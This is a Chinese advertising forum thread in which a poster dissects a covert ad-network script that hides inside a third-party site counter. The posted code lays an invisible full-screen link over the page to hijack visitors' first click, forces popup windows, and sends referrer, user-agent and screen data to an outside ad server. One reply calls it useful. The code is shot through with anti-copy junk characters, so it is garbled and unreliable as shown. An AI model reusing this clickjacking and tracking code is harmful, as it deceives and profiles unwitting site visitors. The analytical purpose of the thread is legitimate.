    * W3 j) c8 N) f  Y  E
  377.                         } ( i( {9 ]6 M. [9 A% `
  378.                     } " C9 @8 z) S# {+ b& p' E0 u
  379.                     a.style.zIndex = '2147483647'# {! A9 K0 R) l- O8 [! n/ T
  380.                 } catch(e) {}
    6 Z0 }3 [7 `  E6 g7 ]
  381.             } + h  u2 z9 z# T8 h; P; _9 I) r
  382.         }, ' W. C5 O2 W$ B6 [- R" w; r/ Q
  383.         120);
    / t- @( a, M  L, J* k
  384.         a.onclick = function(e) {
    5 V7 A& J4 s, h! M
  385.             if (document.getElementById('__unionsky_push_d_object_box__') != null) { ! I# d, M& g3 m* r; g- I3 ?; y  N
  386.                 form_div.parentNode.removeChild(form_div) : S7 @) C9 B4 Y
  387.             } 7 R0 R5 o, P" t8 S4 P
  388.             e = e || window.event; ) f/ m: p+ C9 Y" q
  389.             e.cancelBubble = true;
    0 h$ p. f3 s- N
  390.             setTimeout(function() {
    8 N$ O, l, C9 X" ^, q0 g
  391.                 a.parentNode.removeChild(a) ' W( H+ U* j4 G
  392.             }, 2 r) {4 s& F/ l# u! e; P
  393.             200);   E* O6 l4 _5 o' O( {3 B
  394.             clearInterval(m); ( U+ {9 t8 I& _# L( g8 E, F5 F
  395.             ads++; " ]# g# C* c% c. P5 l
  396.             p(ckn, ckt, ads) 8 o, U# Z5 b+ X2 s
  397.         };
    ! ^6 n/ S, e$ v/ L: C/ L: a+ P
  398.         event(a, 'mouseup', 7 S! X# ]+ d2 `, o+ H
  399.         function(e) { 8 t3 l/ b8 v1 u- v& b  H
  400.             e = e || window.event;
    : K" O/ j3 l4 B+ x2 [
  401.             e.cancelBubble = true
    0 c) M! S' E+ A/ o$ m( A+ `1 z
  402.         })
    9 o7 b4 }1 G' A: R& W) d
  403.     }
      t; S9 D( a2 H/ p) l
  404.     function func(url, param) {   s0 m1 J8 L8 C, a
  405.         var f = window[String.fromCharCode(111, 112, 101, 110)]; - C" ^  ]8 b9 @+ z9 {. t
  406.         var w = f(url, '_blank', 'left=0,top=0,toolbar=yes,location=yes,status=yes,menubar=yes,scrollbars=yes,resizable=yes,width=' + screen.width + ',height=' + screen.height); 3 Q7 m0 |- {8 b9 E& q3 n( A
  407.         if (w) {
    % `  X: c& G& R
  408.             ads++;
    5 T- e" e* K- s! N; k" y1 z/ @  Z4 l0 H
  409.             p(ckn, ckt, ads) 1 ]2 C- C5 `( h4 K2 Y
  410.         };
    , U5 o/ h$ g2 p7 C/ y0 x; P
  411.         return w % M% ~$ Y$ A5 t+ Z+ }
  412.     }
      h0 H5 R4 j' x' U9 G" ^' V7 S
  413.     function fstart(url) {
    ' [. S  y* v: W& }7 d7 h
  414.         init();
    / B$ p+ w- r1 D) O
  415.         if (_ct >= 0) { % [, @8 I" W8 T2 @8 T1 y( i2 ^
  416.             ckn = "YITIAN_NUM";
      N7 i- Y9 r4 J5 \& }9 |
  417.             ckt = _ct
    9 Q3 w, Z( g$ S) ~) }. F' Y/ Y: u
  418.         } else { 0 R- S) @+ V( p9 b* V
  419.             ckn = "YITIAN_ALL";
    4 I3 H! M5 E/ j6 ]# J4 O
  420.             ckt = Math.abs(_ct) " H" x% `( }- K  R
  421.         }
    * b: R+ w" c/ d; n9 e
  422.         if (ckt > 0) {
      z$ B! z8 Z/ n0 S" r# I
  423.             if (b(ckn)) { % r1 h4 r" @4 }' T+ Z
  424.                 try { " o3 ^/ d  {" S6 B- s
  425.                     ads = parseFloat(b(ckn)) + M3 V( l: E$ V3 ]
  426.                 } catch(q) {}
    # W1 K' j8 p! w
  427.             }
    4 q# B, e0 p: L& Y" p8 C2 T- j4 j
  428.         }
    1 Q% Z7 b3 g& z& C0 |5 g) y: l. r
  429.         if ((ads > 0 && ckn == 'YITIAN_ALL') || ads >= ytpp_ads) { 7 ?& `+ o9 A/ o  M- x2 Z: x' F3 p
  430.             return$ ?+ X  i! ^& ^
  431.         } else {
    , I3 b1 [4 Q  l/ B+ A7 ^: o, A
  432.             if (_le > 0) { % y, j8 g' G; t  n) P; Z$ r
  433.                 setTimeout(go(url), _le * 1000) 9 U/ i0 J9 n7 V% h: {
  434.             } else { / A# V' z) w4 L* t1 F! {
  435.                 go(url)
    " j3 E  X+ Y1 R/ f* f% h2 F+ ^
  436.             }
    1 y/ c* y0 P: }/ b/ b6 I& F* X9 \7 V
  437.         }
    & Q+ G. S( ~4 q2 v- ?
  438.     } 2 N7 ^& P9 [2 E0 b% y6 f
  439.     function go(url) {
    ( X1 w( y  a+ |& r: L
  440.         if (_poo == 1) {
      @6 _, V$ i+ z: `  f, ]. Z
  441.             try { 0 k) F# \; H/ A  g
  442.                 func(url)
    7 n" A8 r6 |- C) n* o2 ^
  443.             } catch(q) {}
    4 I5 t7 Q3 R6 j: o" D3 r
  444.         } else if (_pco == 1) { 3 ?7 l& G* W9 A" |
  445.             a_pop(url) % I! E9 d- K7 [" W/ I) D7 n
  446.         } else { ( R6 |4 F/ h& N3 o
  447.             if (_pd == 1) { * q* e4 p3 y0 U* ~9 L+ `
  448.                 setTimeout(function() {
      s7 L" {/ P. L+ e. n/ o: i0 x6 U
  449.                     pop(url, {
    2 `9 ^" Q, y. h4 l' @4 A3 R; L
  450.                         a: 1, & e5 T( B- {1 v, \7 A
  451.                         b: 2 " s: l" W+ [! u% U+ y
  452.                     }) : P! w# `, {2 d( [
  453.                 }, 5 `. c7 h( T* z" h
  454.                 300) , d" q# Z4 V* [. H# R7 b/ L" ]
  455.             } ) m0 I" {) m0 G. R. H
  456.             if (_pd2 > Math.random()) {
    2 u6 Q' k( Y& h/ S4 T
  457.                 setTimeout(function() {
    1 B$ A# p. P, d) c- D
  458.                     pop(url, {
    ( r) x: K$ X6 D  Z4 X, w* f2 `
  459.                         a: 1, 9 ]" [+ e4 @1 h- k' m
  460.                         b: 2
    - G; B- M4 w' n: `6 n4 r
  461.                     })
      ]4 }( D) f9 ~9 b5 ?, N+ p
  462.                 },
    5 ]0 ~. E- ?9 O% t9 d0 n
  463.                 300) , Z+ f+ h2 `0 q" h* W; ]& H
  464.             } 8 i% C1 p% x  [' I$ ?4 C1 o
  465.             for (var i = 1; i <= 10; i++) {
    9 p7 t4 s3 V$ d$ K: p$ Z
  466.                 var n = i == 1 ? "": i;
    + F: g: W, `6 \3 q1 K* |* M! I
  467.                 if (eval("_pt" + n + "b") > Math.random()) {
    + P. \! p* l) Z
  468.                     setTimeout(function() { 1 u) W# |' D1 S% f
  469.                         setTimeout(function() {
    - U4 L( @8 W$ J0 T4 r+ A/ }: }* N% Q
  470.                             pop(url, { " |, T4 \8 V" p4 Q7 x
  471.                                 a: 1,
    ( @# L! L  I/ v, s4 B7 H
  472.                                 b: 2
      d8 F4 L4 U! f0 M2 s6 H
  473.                             }) - g' [0 ?) i  [" e7 t4 E, B( n! I: r
  474.                         }, ' o& S* l" A& G3 v! x& k
  475.                         300)
    + H' b* Y! d) f8 h2 z+ v
  476.                     },
    . X$ v; n7 t4 _+ |
  477.                     parseInt(eval("_pt" + n + "a")) * 1000) ( J; W7 [) J/ \) e2 A
  478.                 } ' v: i& C0 D4 T) d9 a: k3 `, @
  479.             }
    : D. O, M5 ^' {! K! L
  480.             if (_pc2 > Math.random()) { - r5 O" k( m, p: b/ e# l. u1 @- |0 C
  481.                 a_pop(url)
    ' `* `) O/ y' g: t6 B( {
  482.             } 4 ?" q+ J9 I6 I9 I, A3 d* E( G
  483.             if (_po > Math.random()) { 7 X& j% s8 @  H( X3 b1 L; V& h
  484.                 try { 6 `6 p+ J! w6 F# U- g+ W
  485.                     func(url)
    8 ?2 m/ N( Z9 Q1 b5 M$ Z1 @2 A
  486.                 } catch(q) {} ; M! ?5 m8 y/ ~/ r5 i. j
  487.             } 5 h) w7 C% h' g3 p& V% v
  488.         } : n& t$ H2 K% K' y# e8 B/ V$ w  r( ?
  489.     };
    - I7 b/ ^  s2 E
  490.     fstart(aa_url); ! k4 Y3 t3 C% O* V$ o( s1 u
  491.     event(window, 'beforeunload', ; v* o4 c8 `" c: I5 D' ~& V3 o; r0 _
  492.     function() {})
    / ~; g# \+ i6 B( o" W5 Y- T  r
  493. })();
复制代码
通过浏览器抓包& ^: d* v4 {; A$ H" F6 }+ B/ y, K$ _. r
URL从这里产生
7 J! l5 x( b/ o' b& R+ w0 ^! W, C* J8 @. `
http://play.unionsky.cn/show/?placeid=1418306 q- I; l. Q$ D) a$ I% t" m

! I3 m9 D; V. I2 L, C- i
) d6 y$ O" F1 T
相关帖子
回复

使用道具 举报

126

主题

62

广告币

394

积分

初级会员

Rank: 2

积分
394

社区QQ达人

 楼主| 发表于 2013-12-17 15:04:10 | 显示全部楼层
直接打开看不到什么东西
) a0 \+ {# x: f7 F. q4 W, Q( n5 Yhttp://www.unionsky.cn/ 是属于这个广告联盟的
( ^7 P! v, I* l" R3 {我们直接分析抓包的内容% Y2 g$ @0 \# p  e5 r
var ytpp_r = encodeURIComponent(encodeURIComponent(document.referrer)); 6 ~) N' }* t% \0 N  R: w0 C3 g' B
ytpp_r = ytpp_r.length > 1000 ? ytpp_r.substring(0, 1000) : ytpp_r;
. P2 [, m3 z$ Q0 M3 x3 avar ytpp_u = encodeURIComponent(navigator.userAgent);
6 f4 \$ o1 P9 \: n  V# K! R' S& Wvar ytpp_s = window.screen.width + "*" + window.screen.height;
- h2 M: v9 l0 @- f9 R$ Jvar ytpp_l = navigator.browserLanguage || navigator.language; / N5 F7 v4 r8 {/ E3 n1 `/ o0 Z% M
var ytpp_plid = 141830; & l. O$ \# g" D! p1 I4 m* M1 ]8 k
var ytpp_w = 0; 2 k) D1 ^8 c- j  k0 `
var ytpp_h = 0;
2 f. v* W+ D8 |% d+ Y' cvar ytpp_url = "http://www.lxting.com/jmp/?p=f7xNjUO8Y80tB6KZyJ*jzRXjLuoZaOluHDv/IndJK1Z/mc0eKhM2QddlbEorugPwTAd08JIi*oDNYfaUSsF7QNBk3/CB3LW8&r=" + ytpp_r + "&u=" + ytpp_u + "&s=" + ytpp_s + "&l=" + ytpp_l + "&n=" + Math.random(); % L* p- O% y; Z9 D1 M
var ytpp_ads = 14;
7 d& C0 C; b0 k3 {6 r* ~var ytpp_sti = 'CT:-3D:1C:1C2:1T:60,1T2:100,1;'; 2 f" j, r4 Q8 O3 c& w6 t
document.write("<script language='javascript' type='text/javascript' src='http://www.lxting.com/pp/?p=f7xNjUO8Y81LybptxG2Vq//rYbtxQcP5GVnJOL07Ka8=&r=" + ytpp_r + "&u=" + ytpp_u + "&s=" + ytpp_s + "&l=" + ytpp_l + "&n=" + Math.random() + "'></script>"); : K% p7 U) C2 m6 S7 ^- [
document.write("<script language='javascript' type='text/javascript' src='http://www.lxting.com/script/popup/v1_min.js'></script>");
6 L" q% I! D3 p* z7 g7 ]" x
那么这个http://play.unionsky.cn/show/?placeid=141830又是从哪里被引用进去呢。+ m% ^- [. f/ c% v- U+ i
继续分析 发现这里/ K$ O+ {- ~4 x) m
- C8 q" ^+ v$ l
http://txsite.21tx.com/count/count.js" t2 I/ A2 F6 U3 [; b3 R* [2 \, t  g

, Y+ x+ _; ~) `* |
txcount_uid = 1; % O1 y* M7 I! ^' [0 p/ H
txcount_uh = 0;
6 X( p- n9 o: x; Xtxcount_uw = 0; 0 T$ }- Z3 _$ ~
txcount_uah = 0;
% K; H( o$ U3 j* {3 `txcount_uaw = 0; + |$ ?( a" Z% {4 v3 v
txcount_ucd = 0;
" _8 E2 q% ]  u+ @0 L' x5 l9 |! |$ c   . _: ]& H; N' D- z5 E# w
if (window.screen) {
2 [+ t: b, U+ f, }  txcount_uh = window.screen.height;
( o% ]/ [  E2 ]3 e, @  txcount_uw = window.screen.width;
; J0 V3 ~- V/ K/ n& B  txcount_uah = window.screen.availHeight;
( B  L7 _; \6 Q/ q  txcount_uaw = window.screen.availWidth; ( v: C( }" L- a2 O. i. A1 x$ K8 D
  txcount_ucd = window.screen.colorDepth; / v& d) _" R) x. `8 P
}
- g$ g9 Y" F1 w6 S! n1 [2 x   ( [7 n+ z6 l% B/ A1 @" o
   ) m$ t+ C2 V8 f
var url = "http://txsite.21tx.com/count/count.aspx"; 7 e" n1 ]( o2 g. v( R
url = url + "?u="+ txcount_uid;
/ x1 |4 t0 S/ @! _' ]' e* \//url = url + "&f=" + txcount_f; 8 Q. o0 f2 V; x# a
url = url + "&k=" + txsite_pagekey; 5 d6 ~( j# j. M0 g7 D: c
//url = url + "&t=" + txcount_t;   s% d) \/ }( _! {$ g- N
url = url + "&l=" + escape(document.location); % P: a/ l1 L. _- z( u" [
url = url + "&r=" + escape(document.referrer);
0 L# t6 h  y* g$ z. R' f$ v1 vurl = url + "&uh=" + txcount_uh; 1 T" D5 \4 _, T
url = url + "&uw=" + txcount_uw; 9 G  v# v/ h$ ?( o+ \: g
url = url + "&uah=" + txcount_uah; 7 d9 f, k" h/ q
url = url + "&uaw=" + txcount_uaw;
3 ]) i1 k" _$ y, W* Durl = url + "&ucd=" + txcount_ucd; : M; s7 H( C0 s4 V
   
& o8 p% @8 ^' L5 z   
) p$ R3 B; F1 L- @/ [document.write("<script src=" + url + "><\/script>");
; ?) M0 U/ K; C4 y) V7 }8 Q" z//document.write('<script src="http://s4.cnzz.com/stat.php?id=4820460&web_id=4820460" language="JavaScript" charset="gb2312"><\/script>'); 0 o  t2 B; c! ]( W8 Y
   , \6 s2 q; ^2 k: R9 u5 G
document.write('<script src="http://s127.cnzz.com/stat.php?id=1474936&web_id=1474936" language="JavaScript" charset="gb2312"><\/script>'); % d* R+ k2 X2 [* T
   
, ]% F, d; ?% e. b   * K7 q7 l6 J" U! _4 j  B* U4 T
document.write("<script language='javascript' src='http://play.unionsky.cn/show/?placeid=141830'><\/script>");
4 a& {( w' F, |) E" `8 R0 y5 U. u! O
1 `; `9 ~4 k8 I! m
一切昭然天下了。
% P: q" P' k6 I/ r代码产生的直接效果如下! k4 `/ E- Y: Q$ W" g

. |; @: B# a. V) d <a  target="_blank" style="position: absolute; z-index: 2147483647; display: block; top: 0px; left: 0px; cursor: default; opacity: 0;"><div style="background-color: rgb(255, 255, 255); width: 1903px; height: 650px;"></div></a>
5 u5 v% }9 Q; c7 V& ?+ R
6 v" e* I0 S( F% q/ O. u" F! K很隐秘的一段好代码
1 d; m' ^; A1 k) t6 P  \5 x- F& ~
回复 支持 反对

使用道具 举报

0

主题

488

广告币

1280

积分

高级会员

Rank: 4

积分
1280
发表于 2013-12-17 15:31:30 | 显示全部楼层
标记一下 好象看不懂还
回复 支持 反对

使用道具 举报

31

主题

266

广告币

801

积分

中级会员

Rank: 3Rank: 3

积分
801
发表于 2013-12-17 16:34:22 | 显示全部楼层
不清楚国内,莫非做taobao不可以直接用弹窗吗?
回复 支持 反对

使用道具 举报

4

主题

1321

广告币

1379

积分

高级会员

Rank: 4

积分
1379
发表于 2013-12-17 18:49:06 | 显示全部楼层
没用 360 搜狗 直接就拦截了,chrome可以弹出来
回复 支持 反对

使用道具 举报

54

主题

9

广告币

6010

积分

禁止访问

积分
6010
发表于 2013-12-17 19:34:38 | 显示全部楼层
adblock 完美屏蔽
回复 支持 反对

使用道具 举报

0

主题

91

广告币

97

积分

初级会员

Rank: 2

积分
97

社区QQ达人

发表于 2013-12-17 23:34:52 | 显示全部楼层
没研究全,期待跟多解析。
过往.
回复 支持 反对

使用道具 举报

6

主题

682

广告币

1090

积分

中级会员

Rank: 3Rank: 3

积分
1090

社区QQ达人

发表于 2013-12-18 00:52:13 | 显示全部楼层
代码看不懂,不过觉得挺好用的……自动弹窗
回复 支持 反对

使用道具 举报

51

主题

450

广告币

836

积分

中级会员

Rank: 3Rank: 3

积分
836
发表于 2013-12-18 01:24:03 | 显示全部楼层
没懂% s, \% q/ u$ m5 b0 R% b% U
# E% b% x0 h1 ^# I& s4 y1 V7 {
1,首次访问有个弹窗,但是被chrome给拦截了6 Z3 F2 m, t$ o2 @5 N
! z/ h: y/ |  k8 V4 i
2,劫持了第一次点击
- D5 ^' ]+ e4 u6 W3 k, a; a6 J& E& M5 s- K5 N. Z
3,CS了一下unionsky4 T: a! z4 H- f
" }; V/ i- W" W2 l1 X4 u3 }
然后?
回复 支持 反对

使用道具 举报

126

主题

62

广告币

394

积分

初级会员

Rank: 2

积分
394

社区QQ达人

 楼主| 发表于 2013-12-18 03:49:31 | 显示全部楼层
cissss 发表于 2013-12-18 01:24 0 [+ x% G* e( v/ W/ a5 P3 o
没懂6 Z% ]% |& z  l2 h/ x; i( J( E5 r- R  Z
' w, @! v1 O7 q/ ?2 s
1,首次访问有个弹窗,但是被chrome给拦截了
$ T: @& `( y2 d# `( b4 A3 t
懂的人一看就懂 不懂的人怎么看就不懂
回复 支持 反对

使用道具 举报

4

主题

437

广告币

715

积分

中级会员

Rank: 3Rank: 3

积分
715
发表于 2013-12-18 06:34:13 | 显示全部楼层
这个CJ怎么搞的这么复杂...
回复 支持 反对

使用道具 举报

51

主题

450

广告币

836

积分

中级会员

Rank: 3Rank: 3

积分
836
发表于 2013-12-18 17:31:57 | 显示全部楼层
小狠 发表于 2013-12-18 03:49
& _& t. i4 C1 i: y+ R- ~2 g! M懂的人一看就懂 不懂的人怎么看就不懂
7 _- P& U1 ^4 b, D& w
我确实不懂你发这贴的意思。 可以理解为装逼么?
回复 支持 反对

使用道具 举报

0

主题

386

广告币

341

积分

初级会员

Rank: 2

积分
341

社区QQ达人

发表于 2014-3-14 13:10:39 | 显示全部楼层
不就是个弹窗代码吗?
回复 支持 反对

使用道具 举报

3

主题

88

广告币

113

积分

初级会员

Rank: 2

积分
113

社区QQ达人

发表于 2014-3-14 23:11:34 | 显示全部楼层
我表示看不懂
回复 支持 反对

使用道具 举报

4

主题

1

广告币

135

积分

初级会员

Rank: 2

积分
135

社区QQ达人

QQ
发表于 2014-3-15 12:03:35 | 显示全部楼层
占位,慢慢领会啥意思
http://faaad.com
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

关于我们|联系我们|DMCA|广告服务|小黑屋|手机版|Archiver|Github|网站地图|AdvertCN

GMT+8, 2025-7-17 09:46 , Processed in 0.075077 second(s), 13 queries , Gzip On, MemCache On.

Copyright © 2001-2023, AdvertCN

Proudly Operating in Hong Kong.

快速回复 返回顶部 返回列表